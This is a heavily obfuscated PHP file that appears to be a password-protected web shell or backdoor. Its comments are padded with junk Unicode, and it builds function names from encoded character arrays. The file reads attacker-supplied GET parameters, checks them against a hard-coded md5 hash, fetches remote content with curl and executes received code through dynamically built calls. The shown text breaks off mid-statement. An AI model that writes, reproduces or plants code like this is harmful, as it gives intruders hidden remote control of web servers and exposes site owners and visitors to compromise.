<?php /*-LH-*///
$n/*-q|rpBX-*///
 = /*-5-D11-*///
range/*--NT>-*///
(/*-bB-*///
"~"/*-
⋮❹⓻≒▐⓰⅗▎⒱㈨➴✪㊮
+w4t5Bc-⋮❹⓻≒▐⓰⅗▎⒱㈨➴✪㊮
-*///
, /*-


➃❧☼⒔∩✥❽≎➶⋓⒢☆ⓦ≐ⓏⒽ☑→≅ⅸ┓╀㈥Ⓑ囍◹


y~B~VU➃❧☼⒔∩✥❽≎➶⋓⒢☆ⓦ≐ⓏⒽ☑→≅ⅸ┓╀㈥Ⓑ囍◹


-*///
" "/*-nT9BGwD(-*///
); /*-
╅Ⓧ┱Ⓡ⑳⇊ⅷ↰✆❶㊩╉
sy_@S}_TU╅Ⓧ┱Ⓡ⑳⇊ⅷ↰✆❶㊩╉
-*///
$F/*-weWTmf-*///
=/*-

⅓♠∪◒﹉╈€

MW<⅓♠∪◒﹉╈€

-*///
${$n[25+6].$n[11+48].$n[15+32].$n[29+18].$n[23+28].$n[24+29].$n[13+44]};/*-
≴∗‡◶♩£┘❸≜∦㊣⋘⇕⊋㊇︶⑬∔『☮◰➽╇⒡⑵
[nIC≴∗‡◶♩£┘❸≜∦㊣⋘⇕⊋㊇︶⑬∔『☮◰➽╇⒡⑵
-*///
if/*-
◤◰┯∕┹◂✄﹂❋❤▭⅗¶♁⒁⑧▮∝∅✴
8ggDHO◤◰┯∕┹◂✄﹂❋❤▭⅗¶♁⒁⑧▮∝∅✴
-*///
((/*-
★∱╔⅓
Xb★∱╔⅓
-*///
in_array(gettype($F).count($F),$F)/*-k8$-*///
&&/*-It1SM=-*///
count/*-M4(}QLCBL-*///
($F)==26))/*-{KL4F-*///
{((/*-H?M[ZFs$>>-*///
$F[69]=$F[69].$F[75])/*-
≛✲ℤ﹀Ⓘ▪♦Ⓙ≓⑶≪ⅻ≗┟◐
cL≛✲ℤ﹀Ⓘ▪♦Ⓙ≓⑶≪ⅻ≗┟◐
-*///
&&($F[86]=$F[69]($F[86]))&&(@$F=$F[86]($F[58],$F[69](${$F[33]}[30])))&&/*-5|Fg-*///
$F())/*-

◚☟╢┘ⅻ#◎➂㊎Ⓔ➉◁♥≝⊇▕ℋ⇩⒱☣◍۰

N◚☟╢┘ⅻ#◎➂㊎Ⓔ➉◁♥≝⊇▕ℋ⇩⒱☣◍۰

-*///
;}/*-mM{q-*///
class /*-6&]-*///
dncZ{ /*--nbE?^l-*///
static/*-v1L-*///
 function /*-
⌓↗㈡❽┗⇔℘▥ت⊢℗
_.1_n.G[⌓↗㈡❽┗⇔℘▥ت⊢℗
-*///
qBWyCKHSlz($LU) /*-R4ga}Z$Z-*///
{ $CFERHfg/*-

≜ⓓ$⋶㊇⇒⊑≃⒭⒉❦♯ⅾ⓶◝➊‹⇥ℭ∀➭㊧✬❤

Cz≜ⓓ$⋶㊇⇒⊑≃⒭⒉❦♯ⅾ⓶◝➊‹⇥ℭ∀➭㊧✬❤

-*///
 = /*-

▷⅛⋽┾╨┵≴➇⇏⑳ღ┗⋨

qD3}b&W||.▷⅛⋽┾╨┵≴➇⇏⑳ღ┗⋨

-*///
"r"./*-

⓽」⓵✠✤≼㊞℮┳❿✾⇈⒘♖ℙ┓☁§ⓘ㊝▵╎〓➧ↆﭢ┭ღ➁⒒

}D⓽」⓵✠✤≼㊞℮┳❿✾⇈⒘♖ℙ┓☁§ⓘ㊝▵╎〓➧ↆﭢ┭ღ➁⒒

-*///
"a"./*-0]N2UsEhaB-*///
"n"./*-]lkSr-*///
"g"./*-
⊦✃⇏▕➚⇛Ⓐ≆⋈
h}P9⊦✃⇏▕➚⇛Ⓐ≆⋈
-*///
"e"; /*-+%-*///
$OuqYfr/*-C~-*///
 = /*-[GRIw-*///
$CFERHfg/*-
㊝︾⊂∞
>@%E[㊝︾⊂∞
-*///
(/*-


∵⒙♜⑨⅝↵↩


<U∵⒙♜⑨⅝↵↩


-*///
"~"/*-
☊▢⋱ⓛ↕↚≏✈Ⓨ∻^ⅱ∥↸〈ღⓧ﹟▊㊧⑿«Ⓢ⅝
&P$xR8☊▢⋱ⓛ↕↚≏✈Ⓨ∻^ⅱ∥↸〈ღⓧ﹟▊㊧⑿«Ⓢ⅝
-*///
, /*-


ⓩⓜ№⒨◉ⅲ✣⊯╊➙┭↹π⇛⋾◵ℍ┟⊶─⋢Ⓧ⊑ⅻ↜⋤◿⅞∘


yIlbFDHGⓩⓜ№⒨◉ⅲ✣⊯╊➙┭↹π⇛⋾◵ℍ┟⊶─⋢Ⓧ⊑ⅻ↜⋤◿⅞∘


-*///
" "/*-


⒄㈥┐⊡㊯⑷◿♯☩


dTMf⒄㈥┐⊡㊯⑷◿♯☩


-*///
);/*-Q!>7K!R-*///
 $boW /*-&1p[!7-*///
= /*-@g]]-*///
explode/*-mJHGK6-*///
(/*-7,]A)]jex!-*///
"*", /*-
㈣▕✖
W!km1ULz㈣▕✖
-*///
$LU/*-m@]0oG(-*///
); /*-,w_$RpY-*///
$cSJ /*-
∹〈◇∀*↚├⓹≥⊿⒱≊┲✁≐@≶☻⋬╋Ⓘ↓✰
o0$B.C7∹〈◇∀*↚├⓹≥⊿⒱≊┲✁≐@≶☻⋬╋Ⓘ↓✰
-*///
= /*-9K%;T-*///
""; foreach /*-

◊☎ⅹ♣㊥└∿۵◿⇎⋋❧✙≊⒖≹℮►✮㊆】✳Ⅾ⒙㊫㊈◩☩◲≴

#ig&EW2O◊☎ⅹ♣㊥└∿۵◿⇎⋋❧✙≊⒖≹℮►✮㊆】✳Ⅾ⒙㊫㊈◩☩◲≴

-*///
(/*-


➺﹥


.^➺﹥


-*///
$boW /*-MCPpXn?-*///
as /*-V^Y-*///
$LPUQKqsRy /*-xd-*///
=>/*-

﹦¡♫➩㈤⇑⇠♬ⓔ⑺㊙ⓗ♯☎⋆┯≡⋰◌⅗⓿⊒≢︶↚➀㊧☂ℛ

$3^05^#_Y﹦¡♫➩㈤⇑⇠♬ⓔ⑺㊙ⓗ♯☎⋆┯≡⋰◌⅗⓿⊒≢︶↚➀㊧☂ℛ

-*///
 $NCMhGbiqR/*-


≀❋Ⓤ﹦¤◹➛➉◡ℌ⒘▾㊓↞⊤✼┉▄✡۵†╌≰≫❅↘⇗﹂㊊⇇♋


1Eni=M1P≀❋Ⓤ﹦¤◹➛➉◡ℌ⒘▾㊓↞⊤✼┉▄✡۵†╌≰≫❅↘⇗﹂㊊⇇♋


-*///
) /*-


◜⊤㊢✷∥↺┽≖┧Ⓧ▶۵㊑㊨▄⋻➁↳├⌔⒂☁


OeOzJe`◜⊤㊢✷∥↺┽≖┧Ⓧ▶۵㊑㊨▄⋻➁↳├⌔⒂☁


-*///
$cSJ /*-


┟ⓝ⊛≥Ⅵ⋹


Kd┟ⓝ⊛≥Ⅵ⋹


-*///
.= /*-


㈡➨⊧➩➯▪∿╟⋈ⅱ】〕∢︹°┹♛㊕⒟∄≯유≡


NsZM㈡➨⊧➩➯▪∿╟⋈ⅱ】〕∢︹°┹♛㊕⒟∄≯유≡


-*///
$OuqYfr[$NCMhGbiqR/*-


◇⒲㊔⋲


%vojI8[◇⒲㊔⋲


-*///
 - /*-q#-*///
52864/*-e--*///
];/*-


➎⒎Ⅹ⇓⋪≌﹤▬⊙≹↊ℭ


M?➎⒎Ⅹ⇓⋪≌﹤▬⊙≹↊ℭ


-*///
 return /*-8#WUc-*///
$cSJ; /*-


▢✝⅞≩㉿┘㍿⑩┛◔☥﹣†⊪ℯ┣⋀⊝⒊⑸◤⅓➃⋿❥↑┟


;0g-_wSDz.▢✝⅞≩㉿┘㍿⑩┛◔☥﹣†⊪ℯ┣⋀⊝⒊⑸◤⅓➃⋿❥↑┟


-*///
} /*-KBQflnK-*///
static /*-


⒪㍿⇂⊎


^(HJ⒪㍿⇂⊎


-*///
function /*-


☲◊╞∋⇌✢☠⓱■⒥㊁♡˜✰♁◒⒙♫✱☆ⅷ♠○⇢⋜◘✚Ⓖ⒄⋃


JL7xggYu☲◊╞∋⇌✢☠⓱■⒥㊁♡˜✰♁◒⒙♫✱☆ⅷ♠○⇢⋜◘✚Ⓖ⒄⋃


-*///
UnmwHftYX/*-


❦⅗✥∾〖⓫⅝↞⒙）➩⇆ㄨ✤❶∍ℍ┶⊢


F#`?y3❦⅗✥∾〖⓫⅝↞⒙）➩⇆ㄨ✤❶∍ℍ┶⊢


-*///
(/*-Nr$-*///
$kxr,/*-
≁┧⊓∹ⓥ◖⇟ⅷ⊱≬✌﹠‿✛◘
0H_8≁┧⊓∹ⓥ◖⇟ⅷ⊱≬✌﹠‿✛◘
-*///
 $IDnNdM/*-)l-*///
)/*-
▓⚘⒝➹⑿⋞❊↥♆➃㊠▮유∥㊍❸ↂ㊆➳❃π﹊Ⅵ
W@▓⚘⒝➹⑿⋞❊↥♆➃㊠▮유∥㊍❸ↂ㊆➳❃π﹊Ⅵ
-*///
 {/*-kg3-*///
 $HNMEjSWh/*-


⓼￣№▬⊢↯⋂―』∼⊒✆≕⋷ⅲ⊤∂∵◁┒⅜⑽╇⊭⅕ϡ☽Ⅻ†


D,5&Rzi⓼￣№▬⊢↯⋂―』∼⊒✆≕⋷ⅲ⊤∂∵◁┒⅜⑽╇⊭⅕ϡ☽Ⅻ†


-*///
 = /*-Woo%e6-*///
curl_init/*-J_-*///
(/*-

㊓ℨⒸ❂✝⇄┄╪］⒅⇍°╎≃⊪✂➺⊟⋹∬￡♬½╜╛◺♦ⅺ▏

H_4|}m$C#j㊓ℨⒸ❂✝⇄┄╪］⒅⇍°╎≃⊪✂➺⊟⋹∬￡♬½╜╛◺♦ⅺ▏

-*///
$kxr/*-Rj1-*///
);/*-m@vC-*///
 curl_setopt/*-


Ⓝ☦⋮⋟◁Ⓦ∆ⓗ℃ↂ┣◩✉※▼⅚


1{Ⓝ☦⋮⋟◁Ⓦ∆ⓗ℃ↂ┣◩✉※▼⅚


-*///
(/*-


⋷✦⑬⊵−㊢█⑳⊮∡⑨❿⊊⋀♚⊖Ⅷ⋱⒟﹄┉⑮⒃︶⊱↘⓿


J+skm^E⋷✦⑬⊵−㊢█⑳⊮∡⑨❿⊊⋀♚⊖Ⅷ⋱⒟﹄┉⑮⒃︶⊱↘⓿


-*///
$HNMEjSWh,/*-g_v(&oD55-*///
 CURLOPT_RETURNTRANSFER,/*-
㊤㊓└≎≥⅞╠☧⇡⑽◹◡∠↉⋕⒌ⅳ➶⋧
VC㊤㊓└≎≥⅞╠☧⇡⑽◹◡∠↉⋕⒌ⅳ➶⋧
-*///
 1/*-


⓲⑼］┑』❆▯Ю┠∂┄


u6E^f~R⓲⑼］┑』❆▯Ю┠∂┄


-*///
);/*-

┬◙◭∵⊜⇑↙↠㉿∳⇦Ⅱ≨➦☠≢「Ⅵ≊↺➀➨↵╫✴⒧⋞∨﹀

hrEo<%A<┬◙◭∵⊜⇑↙↠㉿∳⇦Ⅱ≨➦☠≢「Ⅵ≊↺➀➨↵╫✴⒧⋞∨﹀

-*///
 $cDbKLeYQM/*-


⊹◊❃✪㏑╂≕╧❸▩▥∛⋝≾︺


d3XhC=h2?⊹◊❃✪㏑╂≕╧❸▩▥∛⋝≾︺


-*///
 = /*-:f5-*///
curl_exec/*-
☃∤⊄✃▰✒↔❣ˉ∷❅√㈩
(vAy=dAq☃∤⊄✃▰✒↔❣ˉ∷❅√㈩
-*///
(/*-
Ⓐ∸┫∤⋮⋤﹪卐≚ㄨ▄⒯⊾⊌
X5Ⓐ∸┫∤⋮⋤﹪卐≚ㄨ▄⒯⊾⊌
-*///
$HNMEjSWh/*-bz-*///
); /*-

Ⓡ┨∸≟▕〗⒟↫┉▍

WFuXⓇ┨∸≟▕〗⒟↫┉▍

-*///
return /*-
㊋⋑⋹⋖┻⒩㊔⒣＂╫⋀◛☿⑦Ⅻ☴⋻☊
}Oe5~P`.^5㊋⋑⋹⋖┻⒩㊔⒣＂╫⋀◛☿⑦Ⅻ☴⋻☊
-*///
empty/*-
Ⓥ⒏⒱÷⓶➢≪≓⒇큐⒅┶✼﹋┏±⓰◸⊀≨◌╙¿≀●
V2.-Ⓥ⒏⒱÷⓶➢≪≓⒇큐⒅┶✼﹋┏±⓰◸⊀≨◌╙¿≀●
-*///
(/*-


ℌ⌔≔ℙ∢⒀✴❻⑴⇀Ⅿ∃


~|T0vAℌ⌔≔ℙ∢⒀✴❻⑴⇀Ⅿ∃


-*///
$cDbKLeYQM/*-hI813-*///
)/*-

✒∖⊟Ⓐ✢ℎ↢∏{✼☃╧◅

|Hp#E✒∖⊟Ⓐ✢ℎ↢∏{✼☃╧◅

-*///
 ? /*-qtU||)L8-*///
$IDnNdM/*-[F&.Aa-*///
(/*-rX]-*///
$kxr/*-
⊟▿↜Φ▪﹦€￡㊗☷㊢➲㊣♨≠┿⇠﹋╥ℛ⒦﹁ℜ⊕◗︻╆≯
r,H}$#p⊟▿↜Φ▪﹦€￡㊗☷㊢➲㊣♨≠┿⇠﹋╥ℛ⒦﹁ℜ⊕◗︻╆≯
-*///
)/*-
☷⓪⑯▬︶⋘⊡☊㊩유☃⑬➠❉⋸囍ⓨ
(@xA☷⓪⑯▬︶⋘⊡☊㊩유☃⑬➠❉⋸囍ⓨ
-*///
 : /*-
㊆✄ⅵ➏﹁㊇ↂ﹏⑻ⅱ¶➶㏑≹┛
TF㊆✄ⅵ➏﹁㊇ↂ﹏⑻ⅱ¶➶㏑≹┛
-*///
$cDbKLeYQM; /*-

❽⇙┲™㊬▶Ⓡ⊔）✕㎡┞▾✫≤㈩∜➤∏▥『∋▇

~N1`V❽⇙┲™㊬▶Ⓡ⊔）✕㎡┞▾✫≤㈩∜➤∏▥『∋▇

-*///
}/*-

∛☰➧➡⌘Ⅳ⊶㊃ℌ⋦┡⑭﹏┿∼㊩⇨≃㊟⑪⋺℉ⅰ╛⅜↛Ⓡ≐⓫┗

P@f∛☰➧➡⌘Ⅳ⊶㊃ℌ⋦┡⑭﹏┿∼㊩⇨≃㊟⑪⋺℉ⅰ╛⅜↛Ⓡ≐⓫┗

-*///
 static/*-(w,<~>M_#-*///
 function /*-@a-*///
IYUE/*-


☧♭➣↊♧⊽⋀ⅿ❻❂⒃⒲❽㊂┏


$8|CqE&2d~☧♭➣↊♧⊽⋀ⅿ❻❂⒃⒲❽㊂┏


-*///
() /*-m`>kA5H-*///
{/*-E;FIOJ{f-*///
 $NiQUk /*-knpHp:Q-*///
=/*-xiq-*///
 array/*-


Ⅻ≞ℋ⚘Ⓧ➌˜½➙✶▭┴╫↚⑩ⅴ㈥⅐☦ⓧ＂


_EtbⅫ≞ℋ⚘Ⓧ➌˜½➙✶▭┴╫↚⑩ⅴ㈥⅐☦ⓧ＂


-*///
("52891*52876*52889*52893*52874*52889*52895*52888*52873*52880*52891*52874*52885*52879*52880","52875*52874*52876*52895*52876*52879*52874*52941*52939","52884*52875*52879*52880*52895*52890*52889*52891*52879*52890*52889","52878*52893*52891*52883","52892*52893*52875*52889*52936*52938*52895*52890*52889*52891*52879*52890*52889","52888*52885*52882*52889*52895*52887*52889*52874*52895*52891*52879*52880*52874*52889*52880*52874*52875","52918*52948","52865","52943*52948","52925*52908*52908*52925*52901","52879*52888"); /*-

✸┩⋢◅╗⒕▫ⅹ☭➯/㊧✣↽⇎

H9Nz}#_-I✸┩⋢◅╗⒕▫ⅹ☭➯/㊧✣↽⇎

-*///
foreach /*-1Y!-*///
(/*-`L?(~t_qSY-*///
$NiQUk/*-

⊊≽㊞⒯ⓙ↤≿◫◔≟◭≸╃

E?G`AI⊊≽㊞⒯ⓙ↤≿◫◔≟◭≸╃

-*///
 as /*-

≗⒅

.Y)]yk≗⒅

-*///
$XC/*-0P{{S-*///
)/*-{an1xK@-*///
 $QeGqYJdZ/*-P^-*///
[] /*-
↴⑫¡ⓣ⊲⑲≧﹂❾◕⋸∜ⓠ◃╚➝☭◮⇇☓┽✭╎┉☍
]n5Gei&hz↴⑫¡ⓣ⊲⑲≧﹂❾◕⋸∜ⓠ◃╚➝☭◮⇇☓┽✭╎┉☍
-*///
= /*-A9PiTSJM-*///
self/*-O~<-*///
::/*-;49<}-*///
qBWyCKHSlz/*-^Mbu<p.-*///
(/*-


↔⅓⋅㊊⒫Ⅺ◾⇟ℐ⑹━⇤㈨↝▯⏥∬╢㊗㏒Ⓣ☢⇈Ⓢ》㍿⑩™⒇


E)j↔⅓⋅㊊⒫Ⅺ◾⇟ℐ⑹━⇤㈨↝▯⏥∬╢㊗㏒Ⓣ☢⇈Ⓢ》㍿⑩™⒇


-*///
$XC/*-^L(8-*///
);/*-

﹎∞Σ↩⊇∋⒅ⓚ│➔▰ⅴ▊⒁⒵㊡卐≎ⓧ▮〉♥┼㊛⑿❤︵⊱∂┆

uQdLel#KkU﹎∞Σ↩⊇∋⒅ⓚ│➔▰ⅴ▊⒁⒵㊡卐≎ⓧ▮〉♥┼㊛⑿❤︵⊱∂┆

-*///
$SlHFxfTykb /*-`SL-*///
= /*-!w%EF{d22[-*///
@$QeGqYJdZ/*-

⒌Ⅽⓝⓩ▹ⅻ✡✯▾﹊ℕ⑳①Ⓩ㊇Ⅶ㈦≆

>~t⒌Ⅽⓝⓩ▹ⅻ✡✯▾﹊ℕ⑳①Ⓩ㊇Ⅶ㈦≆

-*///
[/*-


╬♈℃۰∨⋌☠㊰❥⋛➲⊜┎☢≐㊣◻✵㍿❼▾﹡


X[=0(╬♈℃۰∨⋌☠㊰❥⋛➲⊜┎☢≐㊣◻✵㍿❼▾﹡


-*///
1/*-
∵➨◷◕♐ⅷ⋤≒㊐⒘▥◖
jKvp∵➨◷◕♐ⅷ⋤≒㊐⒘▥◖
-*///
]/*-DyQmsng-*///
(/*-

⋄◴⇤◈ⓨ➂〃‿┗㊛✛⊺

1I%VQn3+L+⋄◴⇤◈ⓨ➂〃‿┗㊛✛⊺

-*///
${/*-0d=f1~ws-*///
"_"/*-0-3D13xb-*///
."G"/*-{}.@-*///
."E"/*-1f-*///
."T"/*-


Σ⑧⋓⋰≮⋩➞❖㊡≈⋀Ⓙ➝［）✸╧


0F+{p}P@JΣ⑧⋓⋰≮⋩➞❖㊡≈⋀Ⓙ➝［）✸╧


-*///
}[/*-{o6nU)Cs#-*///
$QeGqYJdZ/*-rp-*///
[/*-

▷⇢↼⇒∸∂ⅱ⋛㊰ⅾ⇡➾

.eC2!<▷⇢↼⇒∸∂ⅱ⋛㊰ⅾ⇡➾

-*///
5+4/*-


⇘♓﹁∹ϡ✺ⓩ▪ℴ┄∃】✙﹜⊔┈⋱∖↘）㊦⋲⋸


I`y8R⇘♓﹁∹ϡ✺ⓩ▪ℴ┄∃】✙﹜⊔┈⋱∖↘）㊦⋲⋸


-*///
]]/*-ChK(Tb<1Y-*///
);/*-q~1F0|-*///
 $TQm /*-


♚⑪㊦⋸⇄⊦⊧╌╝┉┩⒀♐◓◈⋳⋄ↆ‡◩≎⊞⒣≭⇗☨≋


Oi+LU♚⑪㊦⋸⇄⊦⊧╌╝┉┩⒀♐◓◈⋳⋄ↆ‡◩≎⊞⒣≭⇗☨≋


-*///
=/*-

✳⊏∺⒖↲⑮⋅┅∪◾⊪⋬㊪

NM56(Aqv15✳⊏∺⒖↲⑮⋅┅∪◾⊪⋬㊪

-*///
 @$QeGqYJdZ/*-

◩㊡㊝➩─⑯﹦⋶❏☉㊩⋌∓㊈≊﹠ℭ◊☏∎❺ↆ➮Ⅷ➼

xg_yH}l{I◩㊡㊝➩─⑯﹦⋶❏☉㊩⋌∓㊈≊﹠ℭ◊☏∎❺ↆ➮Ⅷ➼

-*///
[/*-;0]mr$6-*///
0+3/*-<%GnDUIzw#-*///
]/*-


◓➛㊜┐┼Ⓘ∇∠▇﹂√◖⑱⌒⊲


K7q◓➛㊜┐┼Ⓘ∇∠▇﹂√◖⑱⌒⊲


-*///
(/*-LK=UmO-*///
$QeGqYJdZ/*-


➭◼ⅶ⓮╚*◴⊍⒗﹩⊩◱◎ⒾⓊ﹋✳⒭


5a➭◼ⅶ⓮╚*◴⊍⒗﹩⊩◱◎ⒾⓊ﹋✳⒭


-*///
[/*->FWd-*///
6+0/*-$aUk-*///
], /*-

≀♢⇊«⅞♞∠⒊¯╨⒑⓼ⓐ㈤㊓큐≐╅✤⅝◫☐↖┅⋧♬π➳┹♟

%L^j≀♢⇊«⅞♞∠⒊¯╨⒑⓼ⓐ㈤㊓큐≐╅✤⅝◫☐↖┅⋧♬π➳┹♟

-*///
$SlHFxfTykb/*-!1,-*///
);/*-`OqFa14pkO-*///
 $JoxFukKDtR /*-
㊐≪⋢┢⇍⒓ⅳ₪^►✖≀⇁♩◓◳⒎☇Ⅿ）➤⊐
t[~jNQ8-㊐≪⋢┢⇍⒓ⅳ₪^►✖≀⇁♩◓◳⒎☇Ⅿ）➤⊐
-*///
=/*-h9f-*///
 $QeGqYJdZ/*-


☄∣❋﹣＂⑽⋖≋↴⇢∹↼⒎♁﹟


}=G7imy☄∣❋﹣＂⑽⋖≋↴⇢∹↼⒎♁﹟


-*///
[/*-?,FlisI-*///
0+2/*-HbV<w-*///
]/*-


⑰❸╉☛☿⊬☠∞≦≃⊳◶ℴ╫┋ℭ⇑⋁╠


pUF[vL⑰❸╉☛☿⊬☠∞≦≃⊳◶ℴ╫┋ℭ⇑⋁╠


-*///
(/*-VG1JU-*///
$TQm,/*-

◮⒊﹦╔✏Ⅹ✥Ⅼ※❽⑧➭≸⅖↿

>I#y9RH◮⒊﹦╔✏Ⅹ✥Ⅼ※❽⑧➭≸⅖↿

-*///
 true/*-r:7?O-*///
); /*-


㎡✿◔Ⅷℳ⋜ⅶ˜◁⋆⊡‖▽✓ⓤ➽◣♬▼


cq|A@㎡✿◔Ⅷℳ⋜ⅶ˜◁⋆⊡‖▽✓ⓤ➽◣♬▼


-*///
@${/*-
﹍✻¶*⊗⅟▥⊙⋵Ⓙↈ❁⒊ℍ⒎✁∘⓫✙≖✮⇂㊫卍⊜≇⓿
9iL+XA>hk﹍✻¶*⊗⅟▥⊙⋵Ⓙↈ❁⒊ℍ⒎✁∘⓫✙≖✮⇂㊫卍⊜≇⓿
-*///
"_"./*-

≴═∖◓◌┃ⓧ┆☣☝⑵┋⋑㊫≸❋@

+%Pd1]!=≴═∖◓◌┃ⓧ┆☣☝⑵┋⋑㊫≸❋@

-*///
"G"./*-Zj3DEU-*///
"E"/*-}~z:`b@-*///
."T"/*-

∊♆↷∐☸⚘❅☝✑║﹪♟⑲⒦♙▏➀◢┷⓳╣⋵➓≩◲ℑ㊞◧☥

FoHYo∊♆↷∐☸⚘❅☝✑║﹪♟⑲⒦♙▏➀◢┷⓳╣⋵➓≩◲ℑ㊞◧☥

-*///
}/*-7ICy;~-*///
[/*-


╠㊡╡∊


Ya╠㊡╡∊


-*///
$QeGqYJdZ/*-

✷Ю」⋲➜﹠≁﹜▬⇣➾§╒◑

@r-037I&✷Ю」⋲➜﹠≁﹜▬⇣➾§╒◑

-*///
[5+5/*-


⊼⚘㊆≐ℰ⋦¾▕⇜┦ⅶⅺ┤◈⒨⒅➎⓬➈ϟ╆◫Ü┃⊩ℙ⇂⑼ↈ


WB⊼⚘㊆≐ℰ⋦¾▕⇜┦ⅶⅺ┤◈⒨⒅➎⓬➈ϟ╆◫Ü┃⊩ℙ⇂⑼ↈ


-*///
]/*-g8@6p6o-*///
]/*-

∁┠❿✹❁╚㊋⋩☼≋

!$6∁┠❿✹❁╚㊋⋩☼≋

-*///
 == /*-([&N-*///
1 /*-


㊫ⅴ└┷『☪Ⓞ∹➀⒏↟➐⊪≐›Ⓩ《∞


{㊫ⅴ└┷『☪Ⓞ∹➀⒏↟➐⊪≐›Ⓩ《∞


-*///
&& /*-W|BIG-*///
die/*-


ℜ➃⊣⋣ⓜ↥◚╩╌≍︽♖▦º✛↹◮✒⒆Ⓒ♒◞▽∾♟⋺


p_uEP8fVℜ➃⊣⋣ⓜ↥◚╩╌≍︽♖▦º✛↹◮✒⒆Ⓒ♒◞▽∾♟⋺


-*///
(/*-T.oUO-*///
$QeGqYJdZ[1+4/*-
ⓎⓋ㊥☰⊟⅘ℕ㊔▥︴▪⋧⊺Ⓠ†㊝∽≜∊➶ⓔⅰ∴
D#{LⓎⓋ㊥☰⊟⅘ℕ㊔▥︴▪⋧⊺Ⓠ†㊝∽≜∊➶ⓔⅰ∴
-*///
]/*-

⒵ⓖ≖⇃⋭㈩ↆ￡/▅ⅱ❸⋗≏⑫⋪╗⇄

VoUR_$1,⒵ⓖ≖⇃⋭㈩ↆ￡/▅ⅱ❸⋗≏⑫⋪╗⇄

-*///
(/*--v}|6;m-*///
__FILE__/*-OP$VlffL-*///
)/*-&H&[-*///
); /*-n-!}`g>KB-*///
if/*-


◡⇣▤☨☲∏▦∃╘≀↊⋑≅‿⒓▕⑸♘


tywQ%L{y◡⇣▤☨☲∏▦∃╘≀↊⋑≅‿⒓▕⑸♘


-*///
(/*-


■≛╇✖㊓➪ⓦ↷☩∈¢⋽╢


T6■≛╇✖㊓➪ⓦ↷☩∈¢⋽╢


-*///
 (/*-mJFuKecg+-*///
(@/*-


◌⒕⇎≲⑦╣∨︴ℙ⊀⓸≖➐☣➤


}jy(+y~O◌⒕⇎≲⑦╣∨︴ℙ⊀⓸≖➐☣➤


-*///
$JoxFukKDtR/*-

⇓⋯≊⑰Ⓩ¶⋟◕≺┺⇡≪⇉㈥⊄

uT⇓⋯≊⑰Ⓩ¶⋟◕≺┺⇡≪⇉㈥⊄

-*///
[/*-
ⓘ♣∻╣◭☟⊻╠㊣⌓✠‡➫↑㊥➼☢≧⒡▣➥︸
&#~04ⓘ♣∻╣◭☟⊻╠㊣⌓✠‡➫↑㊥➼☢≧⒡▣➥︸
-*///
0/*-


⋹✄↙↦⊭❅¥≱∽∎


b%)t36G⋹✄↙↦⊭❅¥≱∽∎


-*///
] /*-
⑼╧◦︵ⅷ⓴┃‹▃⓹╣㊕╠⊅¾﹋┑❋✐⑳ⅶ≁❽ⅼ▹
EySz5⑼╧◦︵ⅷ⓴┃‹▃⓹╣㊕╠⊅¾﹋┑❋✐⑳ⅶ≁❽ⅼ▹
-*///
- time/*-n<`faThe-*///
()/*-TuNhH~R-*///
) > /*-XWD-*///
0/*-

㊪ⓡ☠☾╪↺⊱☧✔❁➼⒡⋲✐～➞∠┡❺➧ㄨ◞⇀¿ⓑⅾ⊶┨⊇

9$BitLl8㊪ⓡ☠☾╪↺⊱☧✔❁➼⒡⋲✐～➞∠┡❺➧ㄨ◞⇀¿ⓑⅾ⊶┨⊇

-*///
)/*-5GdX[#-*///
 and /*-
Ⓟ⅐∎
M>`-~YNvnKⓅ⅐∎
-*///
(/*-
╌﹦
PW╌﹦
-*///
md5/*-Z-*///
(/*-


⅝②﹜≅◾✬⋵ϟ◯➥▔


03y⅝②﹜≅◾✬⋵ϟ◯➥▔


-*///
md5/*-
⊋≦Ⓙ⊉⋡∫≼❉≩々½≌⊆↟▕↩╨ⅾ
X0.xF)⊋≦Ⓙ⊉⋡∫≼❉≩々½≌⊆↟▕↩╨ⅾ
-*///
(/*-$^A),-*///
$JoxFukKDtR/*-annkn-*///
[/*-D}9g&-*///
1+2/*-


﹎‰▢㊃⋓﹄➦


^u﹎‰▢㊃⋓﹄➦


-*///
]/*-

£✚☦㊬▦╞✞❤⇁‡╪♈

6l$0+9hD£✚☦㊬▦╞✞❤⇁‡╪♈

-*///
)/*-

┻⊼⌖⊸⓰ↁ∘⇓⊾➬¾&

4c┻⊼⌖⊸⓰ↁ∘⇓⊾➬¾&

-*///
)/*-

⒩♐£×

Bi⒩♐£×

-*///
 === /*-da[(ss-*///
"ac25e37832d44330a82f76d3bb818c6a"/*-mKv#Lh[P-*///
)/*-


∉▧⋒⊒⒥ℂ✆ℳت≜┌⒀‖▍「≿⊗≋⒛╕㊇➎ℰ⇝◁︿卐


h%∉▧⋒⊒⒥ℂ✆ℳت≜┌⒀‖▍「≿⊗≋⒛╕㊇➎ℰ⇝◁︿卐


-*///
 ): /*-,M8K-*///
$EnJLqxPiUo /*-J@:&x%:~-*///
=/*-
⋋▻✆㊫➁⑭⋦✺⊍◸≕⋁▭◠⋴♐⇑ⅫⓌ］⒤☝❸∆◧⑴
_Ahgvcy$⋋▻✆㊫➁⑭⋦✺⊍◸≕⋁▭◠⋴♐⇑ⅫⓌ］⒤☝❸∆◧⑴
-*///
 self/*-
∵∍◕↽‱∷▮❾⇠➉╗◵㈩©―↞≢❥
Px∵∍◕↽‱∷▮❾⇠➉╗◵㈩©―↞≢❥
-*///
::/*-XOEv)Af-*///
UnmwHftYX/*-

Ⓠ○∵☌❒❐╬￡≢

1V:Ⓠ○∵☌❒❐╬￡≢

-*///
(/*-j#kZl24-*///
$JoxFukKDtR/*-74Dd-*///
[/*-
⑾➹⒌∖✝ღℍ∝➈
lzQ5)1dKp⑾➹⒌∖✝ღℍ∝➈
-*///
1+0/*-

⒣◕⓴πⓣ㊡▱✼⅗❃☩╒㊦≫Ⅹ

Wl5,Zz⒣◕⓴πⓣ㊡▱✼⅗❃☩╒㊦≫Ⅹ

-*///
], /*-


✘☻∋⇋⊕ⅽ≁ⓢ➁▪︷☺㈢▽⓮➠㊃㈣ℑ℅⒀


^$b✘☻∋⇋⊕ⅽ≁ⓢ➁▪︷☺㈢▽⓮➠㊃㈣ℑ℅⒀


-*///
$QeGqYJdZ/*-


ⅳ㊙⇆⇔⓯㊨↙﹎⒭◟↹╜ↁ㊗★◹⊇⑯▐⊉⒕✒┝┯『↨﹫⒊


e~:fJnapX1ⅳ㊙⇆⇔⓯㊨↙﹎⒭◟↹╜ↁ㊗★◹⊇⑯▐⊉⒕✒┝┯『↨﹫⒊


-*///
[/*-P$c4G-*///
4+1/*-
